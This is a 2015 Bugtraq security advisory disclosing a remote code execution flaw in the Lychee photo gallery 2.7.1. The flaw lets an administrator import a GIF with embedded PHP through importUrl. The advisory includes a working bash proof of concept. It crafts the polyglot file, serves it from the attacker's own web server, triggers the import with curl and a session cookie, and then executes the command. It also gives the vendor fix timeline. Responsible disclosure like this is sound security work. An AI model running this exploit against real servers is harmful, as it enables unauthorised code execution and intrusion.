[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Lychee 2.7.1 remote code execution
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Lychee 2.7.1 remote code execution
- From: Filippo Cavallarin <filippo.cavallarin@segment.technology>
- Date: Thu, 16 Apr 2015 16:25:43 +0200
Advisory ID: SGMA15-002
Title: Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vendor: lychee.electerious.com
Vulnerability type: Remote Code Execution
Risk level: High
Credit: Filippo Cavallarin - segment.technology
CVE: N/A
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15
Details
Lychee version 2.7.1 and probably below suffers from remote code execution
vulnerability.
The vulnerability resides in the importUrl function that fails to restrict file
types due to the lack of file extension validation.
Since the imported file is stored in a web-readable directory where php files
can be executed, remote code execution can be achieved.
Even if the import is limited to image files only, an attacker can abuse this
vulnerability by importing a
specially crafted image file containing PHP code.
To exploit this vulnerability the attacker must be logged as administrator.
The following proof of concept demostrates the issue
#!/bin/bash
LYCHEE_HOST="lychee.local"
PHPSESSID="e0ac560kmqf0lli9u5jd20qt46"
LOCALIP="172.16.85.1"
CMD="uname -a"
cd /tmp || exit 1
echo "Creating gif..."
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php
system('$CMD')?>"
echo -e $GIF > gif.php
echo "Starting local webserver"
python -m SimpleHTTPServer > /dev/null 2>&1 &
sleep 1
echo "Starting the import procedure"
curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID"
--data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"
sleep 5
kill %1
rm gif.php
echo "Executing command.."
curl "http://$LYCHEE_HOST/data/gif.php"
#EOF
Solution
Upgrade to Lychee version 2.7.2
References
http://lychee.electerious.com
Filippo Cavallarin
https://segment.technology/